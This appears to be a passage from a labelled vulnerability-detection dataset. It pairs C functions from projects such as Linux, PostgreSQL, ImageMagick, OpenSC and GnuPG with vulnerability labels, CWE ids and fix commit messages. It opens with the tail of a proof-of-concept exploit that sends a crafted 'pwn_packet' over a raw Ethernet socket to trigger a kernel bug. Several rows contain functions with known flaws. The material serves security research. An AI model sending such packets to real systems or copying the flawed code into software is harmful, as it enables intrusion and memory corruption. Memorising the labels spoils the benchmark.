.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <[email protected]>
Acked-by: Dan Carpenter <[email protected]>
Cc: stable <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
static int sev_guest_init(struct kvm *kvm, struct kvm_sev_cmd *argp)
{
struct kvm_sev_info *sev = &to_kvm_svm(kvm)->sev_info;
int asid, ret;
ret = -EBUSY;
if (unlikely(sev->active))
return ret;
asid = sev_asid_new();
if (asid < 0)
return ret;
ret = sev_platform_init(&argp->error);
if (ret)
goto e_free;
sev->active = true;
sev->asid = asid;
INIT_LIST_HEAD(&sev->regions_list);
return 0;
e_free:
sev_asid_free(asid);
return ret;
}
| 0 |
[
"CWE-401"
] |
linux
|
d80b64ff297e40c2b6f7d7abc1b3eba70d22a068
| 112,816,211,679,516,450,000,000,000,000,000,000,000 | 27 |
KVM: SVM: Fix potential memory leak in svm_cpu_init()
When allocating memory for sd->sev_vmcbs fails, we forget to free the page
held by sd->save_area. Also get rid of the var r as '-ENOMEM' is actually
the only possible outcome here.
Reviewed-by: Liran Alon <[email protected]>
Reviewed-by: Vitaly Kuznetsov <[email protected]>
Signed-off-by: Miaohe Lin <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
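A simplified sketch of the corrected error path in svm_cpu_init():
sd->save_area = alloc_page(GFP_KERNEL);
if (!sd->save_area)
	return -ENOMEM;

if (svm_sev_enabled()) {
	sd->sev_vmcbs = kmalloc_array(max_sev_asid + 1, sizeof(void *),
				      GFP_KERNEL);
	if (!sd->sev_vmcbs) {
		__free_page(sd->save_area);	/* was leaked before the fix */
		return -ENOMEM;
	}
}
return 0;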
|
has_column_privilege_id_name(PG_FUNCTION_ARGS)
{
Oid tableoid = PG_GETARG_OID(0);
text *column = PG_GETARG_TEXT_P(1);
text *priv_type_text = PG_GETARG_TEXT_P(2);
Oid roleid;
AttrNumber colattnum;
AclMode mode;
int privresult;
roleid = GetUserId();
colattnum = convert_column_name(tableoid, column);
mode = convert_column_priv_string(priv_type_text);
privresult = column_privilege_check(tableoid, colattnum, roleid, mode);
if (privresult < 0)
PG_RETURN_NULL();
PG_RETURN_BOOL(privresult);
}
| 0 |
[
"CWE-264"
] |
postgres
|
fea164a72a7bfd50d77ba5fb418d357f8f2bb7d0
| 42,753,953,224,791,890,000,000,000,000,000,000,000 | 19 |
Shore up ADMIN OPTION restrictions.
Granting a role without ADMIN OPTION is supposed to prevent the grantee
from adding or removing members from the granted role. Issuing SET ROLE
before the GRANT bypassed that, because the role itself had an implicit
right to add or remove members. Plug that hole by recognizing that
implicit right only when the session user matches the current role.
Additionally, do not recognize it during a security-restricted operation
or during execution of a SECURITY DEFINER function. The restriction on
SECURITY DEFINER is not security-critical. However, it seems best for a
user testing his own SECURITY DEFINER function to see the same behavior
others will see. Back-patch to 8.4 (all supported versions).
The SQL standards do not conflate roles and users as PostgreSQL does;
only SQL roles have members, and only SQL users initiate sessions. An
application using PostgreSQL users and roles as SQL users and roles will
never attempt to grant membership in the role that is the session user,
so the implicit right to add or remove members will never arise.
The security impact was mostly that a role member could revoke access
from others, contrary to the wishes of his own grantor. Unapproved role
member additions are less notable, because the member can still largely
achieve that by creating a view or a SECURITY DEFINER function.
Reviewed by Andres Freund and Tom Lane. Reported, independently, by
Jonas Sundman and Noah Misch.
Security: CVE-2014-0060
|
ipmi_lan_alert_print_all(struct ipmi_intf * intf, uint8_t channel)
{
int j, ndest;
struct lan_param * p;
p = get_lan_param(intf, channel, IPMI_LANP_NUM_DEST);
if (!p)
return -1;
if (!p->data)
return -1;
ndest = p->data[0] & 0xf;
for (j=0; j<=ndest; j++) {
ipmi_lan_alert_print(intf, channel, j);
}
return 0;
}
| 0 |
[
"CWE-120"
] |
ipmitool
|
d45572d71e70840e0d4c50bf48218492b79c1a10
| 295,921,011,102,040,380,000,000,000,000,000,000,000 | 18 |
lanp: Fix buffer overflows in get_lan_param_select
Partial fix for CVE-2020-5208, see
https://github.com/ipmitool/ipmitool/security/advisories/GHSA-g659-9qxw-p7cp
The `get_lan_param_select` function is missing a validation check on the
response’s `data_len`, which it then returns to caller functions, where
stack buffer overflow can occur.
|
static Image *ReadPWPImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
char
filename[MaxTextExtent];
FILE
*file;
Image
*image,
*next_image,
*pwp_image;
ImageInfo
*read_info;
int
c,
unique_file;
MagickBooleanType
status;
register Image
*p;
register ssize_t
i;
size_t
filesize,
length;
ssize_t
count;
unsigned char
magick[MaxTextExtent];
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImage(image_info);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImage(image);
return((Image *) NULL);
}
pwp_image=image;
memset(magick,0,sizeof(magick));
count=ReadBlob(pwp_image,5,magick);
if ((count != 5) || (LocaleNCompare((char *) magick,"SFW95",5) != 0))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
read_info=CloneImageInfo(image_info);
(void) SetImageInfoProgressMonitor(read_info,(MagickProgressMonitor) NULL,
(void *) NULL);
SetImageInfoBlob(read_info,(void *) NULL,0);
unique_file=AcquireUniqueFileResource(filename);
(void) FormatLocaleString(read_info->filename,MagickPathExtent,"sfw:%s",
filename);
for ( ; ; )
{
(void) memset(magick,0,sizeof(magick));
for (c=ReadBlobByte(pwp_image); c != EOF; c=ReadBlobByte(pwp_image))
{
for (i=0; i < 17; i++)
magick[i]=magick[i+1];
magick[17]=(unsigned char) c;
if (LocaleNCompare((char *) (magick+12),"SFW94A",6) == 0)
break;
}
if (c == EOF)
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowReaderException(CorruptImageError,"UnexpectedEndOfFile");
}
if (LocaleNCompare((char *) (magick+12),"SFW94A",6) != 0)
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
/*
Dump SFW image to a temporary file.
*/
file=(FILE *) NULL;
if (unique_file != -1)
file=fdopen(unique_file,"wb");
if ((unique_file == -1) || (file == (FILE *) NULL))
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowFileException(exception,FileOpenError,"UnableToWriteFile",
image->filename);
image=DestroyImageList(image);
return((Image *) NULL);
}
length=fwrite("SFW94A",1,6,file);
(void) length;
filesize=65535UL*magick[2]+256L*magick[1]+magick[0];
for (i=0; i < (ssize_t) filesize; i++)
{
c=ReadBlobByte(pwp_image);
if (c == EOF)
break;
(void) fputc(c,file);
}
(void) fclose(file);
if (c == EOF)
{
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
ThrowReaderException(CorruptImageError,"UnexpectedEndOfFile");
}
next_image=ReadImage(read_info,exception);
if (next_image == (Image *) NULL)
break;
(void) FormatLocaleString(next_image->filename,MaxTextExtent,
"slide_%02ld.sfw",(long) next_image->scene);
if (image == (Image *) NULL)
image=next_image;
else
{
/*
Link image into image list.
*/
for (p=image; p->next != (Image *) NULL; p=GetNextImageInList(p)) ;
next_image->previous=p;
next_image->scene=p->scene+1;
p->next=next_image;
}
if (image_info->number_scenes != 0)
if (next_image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
status=SetImageProgress(image,LoadImagesTag,TellBlob(pwp_image),
GetBlobSize(pwp_image));
if (status == MagickFalse)
break;
}
if (unique_file != -1)
(void) close(unique_file);
(void) RelinquishUniqueFileResource(filename);
read_info=DestroyImageInfo(read_info);
if (image != (Image *) NULL)
{
if (EOFBlob(image) != MagickFalse)
{
char
*message;
message=GetExceptionMessage(errno);
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageError,"UnexpectedEndOfFile","`%s': %s",image->filename,
message);
message=DestroyString(message);
}
(void) CloseBlob(image);
}
return(GetFirstImageInList(image));
}
| 1 |
[
"CWE-252"
] |
ImageMagick6
|
11d9dac3d991c62289d1ef7a097670166480e76c
| 55,802,806,649,703,300,000,000,000,000,000,000,000 | 169 |
https://github.com/ImageMagick/ImageMagick/issues/1199
|
static int snd_seq_ioctl_get_queue_tempo(struct snd_seq_client *client,
void *arg)
{
struct snd_seq_queue_tempo *tempo = arg;
struct snd_seq_queue *queue;
struct snd_seq_timer *tmr;
queue = queueptr(tempo->queue);
if (queue == NULL)
return -EINVAL;
memset(tempo, 0, sizeof(*tempo));
tempo->queue = queue->queue;
tmr = queue->timer;
tempo->tempo = tmr->tempo;
tempo->ppq = tmr->ppq;
tempo->skew_value = tmr->skew;
tempo->skew_base = tmr->skew_base;
queuefree(queue);
return 0;
}
| 0 |
[
"CWE-416",
"CWE-362"
] |
linux
|
71105998845fb012937332fe2e806d443c09e026
| 169,607,210,909,051,070,000,000,000,000,000,000,000 | 23 |
ALSA: seq: Fix use-after-free at creating a port
There is a potential race window opened at creating and deleting a
port via ioctl, as spotted by fuzzing. snd_seq_create_port() creates
a port object and returns its pointer, but it doesn't take the
refcount, thus it can be deleted immediately by another thread.
Meanwhile, snd_seq_ioctl_create_port() still calls the function
snd_seq_system_client_ev_port_start() with the created port object
that is being deleted, and this triggers use-after-free like:
BUG: KASAN: use-after-free in snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] at addr ffff8801f2241cb1
=============================================================================
BUG kmalloc-512 (Tainted: G B ): kasan: bad access detected
-----------------------------------------------------------------------------
INFO: Allocated in snd_seq_create_port+0x94/0x9b0 [snd_seq] age=1 cpu=3 pid=4511
___slab_alloc+0x425/0x460
__slab_alloc+0x20/0x40
kmem_cache_alloc_trace+0x150/0x190
snd_seq_create_port+0x94/0x9b0 [snd_seq]
snd_seq_ioctl_create_port+0xd1/0x630 [snd_seq]
snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
snd_seq_ioctl+0x40/0x80 [snd_seq]
do_vfs_ioctl+0x54b/0xda0
SyS_ioctl+0x79/0x90
entry_SYSCALL_64_fastpath+0x16/0x75
INFO: Freed in port_delete+0x136/0x1a0 [snd_seq] age=1 cpu=2 pid=4717
__slab_free+0x204/0x310
kfree+0x15f/0x180
port_delete+0x136/0x1a0 [snd_seq]
snd_seq_delete_port+0x235/0x350 [snd_seq]
snd_seq_ioctl_delete_port+0xc8/0x180 [snd_seq]
snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
snd_seq_ioctl+0x40/0x80 [snd_seq]
do_vfs_ioctl+0x54b/0xda0
SyS_ioctl+0x79/0x90
entry_SYSCALL_64_fastpath+0x16/0x75
Call Trace:
[<ffffffff81b03781>] dump_stack+0x63/0x82
[<ffffffff81531b3b>] print_trailer+0xfb/0x160
[<ffffffff81536db4>] object_err+0x34/0x40
[<ffffffff815392d3>] kasan_report.part.2+0x223/0x520
[<ffffffffa07aadf4>] ? snd_seq_ioctl_create_port+0x504/0x630 [snd_seq]
[<ffffffff815395fe>] __asan_report_load1_noabort+0x2e/0x30
[<ffffffffa07aadf4>] snd_seq_ioctl_create_port+0x504/0x630 [snd_seq]
[<ffffffffa07aa8f0>] ? snd_seq_ioctl_delete_port+0x180/0x180 [snd_seq]
[<ffffffff8136be50>] ? taskstats_exit+0xbc0/0xbc0
[<ffffffffa07abc5c>] snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
[<ffffffffa07abd10>] snd_seq_ioctl+0x40/0x80 [snd_seq]
[<ffffffff8136d433>] ? acct_account_cputime+0x63/0x80
[<ffffffff815b515b>] do_vfs_ioctl+0x54b/0xda0
.....
We may fix this in a few different ways, and in this patch, it's fixed
simply by taking the refcount properly at snd_seq_create_port() and
letting the caller unref the object after use. Also, there is another
potential use-after-free by sprintf() call in snd_seq_create_port(),
and this is moved inside the lock.
This fix covers CVE-2017-15265.
Reported-and-tested-by: Michael23 Yu <[email protected]>
Suggested-by: Linus Torvalds <[email protected]>
Cc: <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]>
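As a hedged illustration of the refcount-before-return pattern the commit describes (hypothetical names and userspace C11 atomics, not the ALSA sequencer code): the creator hands the caller an object that already holds an extra reference, so a concurrent delete cannot drop the last reference while the caller is still using it.
#include <stdatomic.h>
#include <stdlib.h>

struct port {                         /* simplified stand-in for a seq port */
    atomic_int refcnt;
    int id;
};

/* Creator returns the object with an extra reference already taken, so a
   delete racing on another thread cannot free it while the caller is still
   initialising or announcing the port. */
static struct port *port_create(int id)
{
    struct port *p = calloc(1, sizeof(*p));
    if (p == NULL)
        return NULL;
    atomic_init(&p->refcnt, 2);       /* 1 for the registry + 1 for the caller */
    p->id = id;
    return p;
}

/* Caller drops its reference when done; the last reference frees the port. */
static void port_put(struct port *p)
{
    if (atomic_fetch_sub(&p->refcnt, 1) == 1)
        free(p);
}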
|
static void hns_xgmac_config_pad_and_crc(void *mac_drv, u8 newval)
{
struct mac_driver *drv = (struct mac_driver *)mac_drv;
u32 origin = dsaf_read_dev(drv, XGMAC_MAC_CONTROL_REG);
dsaf_set_bit(origin, XGMAC_CTL_TX_PAD_B, !!newval);
dsaf_set_bit(origin, XGMAC_CTL_TX_FCS_B, !!newval);
dsaf_set_bit(origin, XGMAC_CTL_RX_FCS_B, !!newval);
dsaf_write_dev(drv, XGMAC_MAC_CONTROL_REG, origin);
}
| 0 |
[
"CWE-119",
"CWE-703"
] |
linux
|
412b65d15a7f8a93794653968308fc100f2aa87c
| 39,785,902,302,672,044,000,000,000,000,000,000,000 | 10 |
net: hns: fix ethtool_get_strings overflow in hns driver
hns_get_sset_count() returns HNS_NET_STATS_CNT and the data space allocated
is not enough for ethtool_get_strings(), which will cause random memory
corruption.
When SLAB and DEBUG_SLAB are both enabled, memory corruptions like the
following can be observed without this patch:
[ 43.115200] Slab corruption (Not tainted): Acpi-ParseExt start=ffff801fb0b69030, len=80
[ 43.115206] Redzone: 0x9f911029d006462/0x5f78745f31657070.
[ 43.115208] Last user: [<5f7272655f746b70>](0x5f7272655f746b70)
[ 43.115214] 010: 70 70 65 31 5f 74 78 5f 70 6b 74 00 6b 6b 6b 6b ppe1_tx_pkt.kkkk
[ 43.115217] 030: 70 70 65 31 5f 74 78 5f 70 6b 74 5f 6f 6b 00 6b ppe1_tx_pkt_ok.k
[ 43.115218] Next obj: start=ffff801fb0b69098, len=80
[ 43.115220] Redzone: 0x706d655f6f666966/0x9f911029d74e35b.
[ 43.115229] Last user: [<ffff0000084b11b0>](acpi_os_release_object+0x28/0x38)
[ 43.115231] 000: 74 79 00 6b 6b 6b 6b 6b 70 70 65 31 5f 74 78 5f ty.kkkkkppe1_tx_
[ 43.115232] 010: 70 6b 74 5f 65 72 72 5f 63 73 75 6d 5f 66 61 69 pkt_err_csum_fai
Signed-off-by: Timmy Li <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
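As a hedged illustration (made-up stat table, not the hns driver itself), the sketch below shows the invariant the fix restores: the count callback and the string-filling callback must be driven by the same table, so a buffer sized from the count can never be overrun.
#include <stdio.h>
#include <string.h>

static const char * const stat_names[] = {
    "rx_packets", "tx_packets", "rx_errors", "tx_errors",
};

/* The count reported to the caller... */
static int get_sset_count(void)
{
    return (int)(sizeof(stat_names) / sizeof(stat_names[0]));
}

/* ...and the strings written into the caller's buffer come from the same
   table, so at most count * entry_len bytes are ever written. */
static void get_strings(char *buf, size_t entry_len)
{
    for (int i = 0; i < get_sset_count(); i++)
        snprintf(buf + (size_t)i * entry_len, entry_len, "%s", stat_names[i]);
}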
|
static inline void ModulateHSB(const double percent_hue,
const double percent_saturation,const double percent_brightness,double *red,
double *green,double *blue)
{
double
brightness,
hue,
saturation;
/*
Increase or decrease color brightness, saturation, or hue.
*/
ConvertRGBToHSB(*red,*green,*blue,&hue,&saturation,&brightness);
hue+=0.5*(0.01*percent_hue-1.0);
while (hue < 0.0)
hue+=1.0;
while (hue > 1.0)
hue-=1.0;
saturation*=0.01*percent_saturation;
brightness*=0.01*percent_brightness;
ConvertHSBToRGB(hue,saturation,brightness,red,green,blue);
}
| 1 |
[
"CWE-835"
] |
ImageMagick
|
a80ee0ee1a083b4991d12ed4c07b7c7c5890f329
| 315,108,743,950,655,500,000,000,000,000,000,000,000 | 22 |
https://www.imagemagick.org/discourse-server/viewtopic.php?f=3&t=31506
|
CImg<T>& blur_guided(const CImg<t>& guide, const float radius, const float regularization) {
return get_blur_guided(guide,radius,regularization).move_to(*this);
}
| 0 |
[
"CWE-770"
] |
cimg
|
619cb58dd90b4e03ac68286c70ed98acbefd1c90
| 53,302,739,205,727,080,000,000,000,000,000,000,000 | 3 |
CImg<>::load_bmp() and CImg<>::load_pandore(): Check that dimensions encoded in file do not exceed file size.
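A minimal sketch of that kind of sanity check, with made-up names and written in plain C rather than CImg's C++: trust width/height from a header only after confirming the pixel data they imply could fit in the bytes of the file.
#include <stdint.h>

/* Returns 0 if width * height * bytes_per_pixel provably fits in file_size,
   -1 otherwise; the divisions keep every comparison overflow-free. */
static int check_dimensions(uint64_t width, uint64_t height,
                            uint64_t bytes_per_pixel, uint64_t file_size)
{
    if (width == 0 || height == 0 || bytes_per_pixel == 0)
        return -1;
    if (height > file_size / width)
        return -1;                   /* width * height alone is too big */
    if (width * height > file_size / bytes_per_pixel)
        return -1;                   /* total payload exceeds the file */
    return 0;
}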
|
g_tcp_can_recv(int sck, int millis)
{
fd_set rfds;
struct timeval time;
int rv;
time.tv_sec = millis / 1000;
time.tv_usec = (millis * 1000) % 1000000;
FD_ZERO(&rfds);
if (sck > 0)
{
FD_SET(((unsigned int)sck), &rfds);
rv = select(sck + 1, &rfds, 0, 0, &time);
if (rv > 0)
{
return g_tcp_socket_ok(sck);
}
}
return 0;
}
| 0 |
[] |
xrdp
|
d8f9e8310dac362bb9578763d1024178f94f4ecc
| 132,898,070,474,991,140,000,000,000,000,000,000,000 | 20 |
move temp files from /tmp to /tmp/.xrdp
|
static int rtecp_select_file(sc_card_t *card,
const sc_path_t *in_path, sc_file_t **file_out)
{
sc_file_t **file_out_copy, *file;
int r;
assert(card && card->ctx && in_path);
switch (in_path->type)
{
case SC_PATH_TYPE_DF_NAME:
case SC_PATH_TYPE_FROM_CURRENT:
case SC_PATH_TYPE_PARENT:
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_NORMAL, SC_ERROR_NOT_SUPPORTED);
}
assert(iso_ops && iso_ops->select_file);
file_out_copy = file_out;
r = iso_ops->select_file(card, in_path, file_out_copy);
if (r || file_out_copy == NULL)
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, r);
assert(file_out_copy);
file = *file_out_copy;
assert(file);
if (file->sec_attr && file->sec_attr_len == SC_RTECP_SEC_ATTR_SIZE)
set_acl_from_sec_attr(card, file);
else
r = SC_ERROR_UNKNOWN_DATA_RECEIVED;
if (r)
sc_file_free(file);
else
{
assert(file_out);
*file_out = file;
}
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, r);
}
| 1 |
[
"CWE-125"
] |
OpenSC
|
8fe377e93b4b56060e5bbfb6f3142ceaeca744fa
| 288,560,964,078,051,800,000,000,000,000,000,000,000 | 35 |
fixed out of bounds reads
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting and suggesting security fixes.
|
ask_curve (int *algo, int both)
{
struct {
const char *name;
int available;
int expert_only;
int fix_curve;
const char *pretty_name;
} curves[] = {
#if GPG_USE_EDDSA
{ "Curve25519", 0, 0, 1, "Curve 25519" },
#endif
#if GPG_USE_ECDSA || GPG_USE_ECDH
{ "NIST P-256", 0, 1, 0, },
{ "NIST P-384", 0, 0, 0, },
{ "NIST P-521", 0, 1, 0, },
{ "brainpoolP256r1", 0, 1, 0, "Brainpool P-256" },
{ "brainpoolP384r1", 0, 1, 0, "Brainpool P-384" },
{ "brainpoolP512r1", 0, 1, 0, "Brainpool P-512" },
{ "secp256k1", 0, 1, 0 },
#endif
};
int idx;
char *answer;
char *result = NULL;
gcry_sexp_t keyparms;
tty_printf (_("Please select which elliptic curve you want:\n"));
again:
keyparms = NULL;
for (idx=0; idx < DIM(curves); idx++)
{
int rc;
curves[idx].available = 0;
if (!opt.expert && curves[idx].expert_only)
continue;
/* FIXME: The strcmp below is a temporary hack during
development. It shall be removed as soon as we have proper
Curve25519 support in Libgcrypt. */
gcry_sexp_release (keyparms);
rc = gcry_sexp_build (&keyparms, NULL,
"(public-key(ecc(curve %s)))",
(!strcmp (curves[idx].name, "Curve25519")
? "Ed25519" : curves[idx].name));
if (rc)
continue;
if (!gcry_pk_get_curve (keyparms, 0, NULL))
continue;
if (both && curves[idx].fix_curve)
{
/* Both Curve 25519 keys are to be created. Check that
Libgcrypt also supports the real Curve25519. */
gcry_sexp_release (keyparms);
rc = gcry_sexp_build (&keyparms, NULL,
"(public-key(ecc(curve %s)))",
curves[idx].name);
if (rc)
continue;
if (!gcry_pk_get_curve (keyparms, 0, NULL))
continue;
}
curves[idx].available = 1;
tty_printf (" (%d) %s\n", idx + 1,
curves[idx].pretty_name?
curves[idx].pretty_name:curves[idx].name);
}
gcry_sexp_release (keyparms);
for (;;)
{
answer = cpr_get ("keygen.curve", _("Your selection? "));
cpr_kill_prompt ();
idx = *answer? atoi (answer) : 1;
if (*answer && !idx)
{
/* See whether the user entered the name of the curve. */
for (idx=0; idx < DIM(curves); idx++)
{
if (!opt.expert && curves[idx].expert_only)
continue;
if (!stricmp (curves[idx].name, answer)
|| (curves[idx].pretty_name
&& !stricmp (curves[idx].pretty_name, answer)))
break;
}
if (idx == DIM(curves))
idx = -1;
}
else
idx--;
xfree(answer);
answer = NULL;
if (idx < 0 || idx >= DIM (curves) || !curves[idx].available)
tty_printf (_("Invalid selection.\n"));
else
{
if (curves[idx].fix_curve)
{
log_info ("WARNING: Curve25519 is not yet part of the"
" OpenPGP standard.\n");
if (!cpr_get_answer_is_yes("experimental_curve.override",
"Use this curve anyway? (y/N) ") )
goto again;
}
/* If the user selected a signing algorithm and Curve25519
we need to update the algo and and the curve name. */
if ((*algo == PUBKEY_ALGO_ECDSA || *algo == PUBKEY_ALGO_EDDSA)
&& curves[idx].fix_curve)
{
*algo = PUBKEY_ALGO_EDDSA;
result = xstrdup ("Ed25519");
}
else
result = xstrdup (curves[idx].name);
break;
}
}
if (!result)
result = xstrdup (curves[0].name);
return result;
}
| 0 |
[
"CWE-20"
] |
gnupg
|
2183683bd633818dd031b090b5530951de76f392
| 255,640,354,967,782,500,000,000,000,000,000,000,000 | 130 |
Use inline functions to convert buffer data to scalars.
* common/host2net.h (buf16_to_ulong, buf16_to_uint): New.
(buf16_to_ushort, buf16_to_u16): New.
(buf32_to_size_t, buf32_to_ulong, buf32_to_uint, buf32_to_u32): New.
--
Commit 91b826a38880fd8a989318585eb502582636ddd8 was not enough to
avoid all sign extension on shift problems. Hanno Böck found a case
with an invalid read due to this problem. To fix that once and for
all almost all uses of "<< 24" and "<< 8" are changed by this patch to
use an inline function from host2net.h.
Signed-off-by: Werner Koch <[email protected]>
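For illustration, a helper in the spirit of the ones this commit adds (approximate, not copied from host2net.h) builds the value from unsigned bytes so no "<< 24" is ever applied to a sign-extended char:
#include <stdint.h>
#include <stdio.h>

static inline uint32_t buf32_to_u32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16)
         | ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

int main(void)
{
    unsigned char buf[4] = { 0xff, 0x00, 0x00, 0x01 };
    /* With a plain signed char and no casts, 0xff would be sign-extended
       before the shift, which is exactly the class of bug described above. */
    printf("%u\n", buf32_to_u32(buf));   /* prints 4278190081 */
    return 0;
}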
|
static int nf_tables_delsetelem(struct sk_buff *skb,
const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
struct nft_set *set;
struct nft_ctx ctx;
int rem, err = 0;
table = nft_table_lookup(net, nla[NFTA_SET_ELEM_LIST_TABLE], family,
genmask, NETLINK_CB(skb).portid);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_ELEM_LIST_TABLE]);
return PTR_ERR(table);
}
set = nft_set_lookup(table, nla[NFTA_SET_ELEM_LIST_SET], genmask);
if (IS_ERR(set))
return PTR_ERR(set);
if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
return -EBUSY;
nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
if (!nla[NFTA_SET_ELEM_LIST_ELEMENTS])
return nft_set_flush(&ctx, set, genmask);
nla_for_each_nested(attr, nla[NFTA_SET_ELEM_LIST_ELEMENTS], rem) {
err = nft_del_setelem(&ctx, set, attr);
if (err < 0)
break;
}
return err;
}
| 0 |
[] |
net
|
520778042ccca019f3ffa136dd0ca565c486cedd
| 305,164,351,860,862,040,000,000,000,000,000,000,000 | 39 |
netfilter: nf_tables: disallow non-stateful expression in sets earlier
Since 3e135cd499bf ("netfilter: nft_dynset: dynamic stateful expression
instantiation"), it is possible to attach stateful expressions to set
elements.
cd5125d8f518 ("netfilter: nf_tables: split set destruction in deactivate
and destroy phase") introduces conditional destruction on the object to
accommodate transaction semantics.
nft_expr_init() calls expr->ops->init() first, then checks for
NFT_STATEFUL_EXPR; this still allows initializing a non-stateful
lookup expression that points to a set, which might lead to UAF since
the set is not properly detached from set->binding in this case.
Anyway, this combination is nonsense from the nf_tables perspective.
This patch fixes this problem by checking for NFT_STATEFUL_EXPR before
expr->ops->init() is called.
The reporter provides a KASAN splat and a poc reproducer (similar to
those autogenerated by syzbot to report use-after-free errors). It is
unknown to me if they are using syzbot or if they use similar automated
tool to locate the bug that they are reporting.
For the record, this is the KASAN splat.
[ 85.431824] ==================================================================
[ 85.432901] BUG: KASAN: use-after-free in nf_tables_bind_set+0x81b/0xa20
[ 85.433825] Write of size 8 at addr ffff8880286f0e98 by task poc/776
[ 85.434756]
[ 85.434999] CPU: 1 PID: 776 Comm: poc Tainted: G W 5.18.0+ #2
[ 85.436023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Fixes: 0b2d8a7b638b ("netfilter: nf_tables: add helper functions for expression handling")
Reported-and-tested-by: Aaron Adams <[email protected]>
Signed-off-by: Pablo Neira Ayuso <[email protected]>
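The ordering fix can be sketched generically in C (hypothetical names, not the nf_tables API): validate the expression type's flags before its init callback runs, so nothing is ever half-initialised and left bound to another object.
#include <errno.h>

#define EXPR_STATEFUL 0x1u

struct expr_ops {
    unsigned int flags;
    int (*init)(void *ctx);
};

/* Reject a non-stateful expression before init() runs: refusing early means
   there is nothing to unwind and no dangling binding to leak or reuse. */
static int stateful_expr_init(const struct expr_ops *ops, void *ctx)
{
    if (!(ops->flags & EXPR_STATEFUL))
        return -EINVAL;
    return ops->init(ctx);
}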
|
template<typename tc, typename t>
CImg<T>& draw_text(const int x0, const int y0,
const char *const text,
const int, const tc *const background_color,
const float opacity, const CImgList<t>& font, ...) {
if (!font) return *this;
CImg<charT> tmp(2048);
std::va_list ap; va_start(ap,font);
cimg_vsnprintf(tmp,tmp._width,text,ap); va_end(ap);
return _draw_text(x0,y0,tmp,(tc*)0,background_color,opacity,font,false);
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 278,585,486,350,780,800,000,000,000,000,000,000,000 | 10 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
void SFS_ObjectMethodCall(ScriptParser *parser)
{
if (parser->codec->LastError) return;
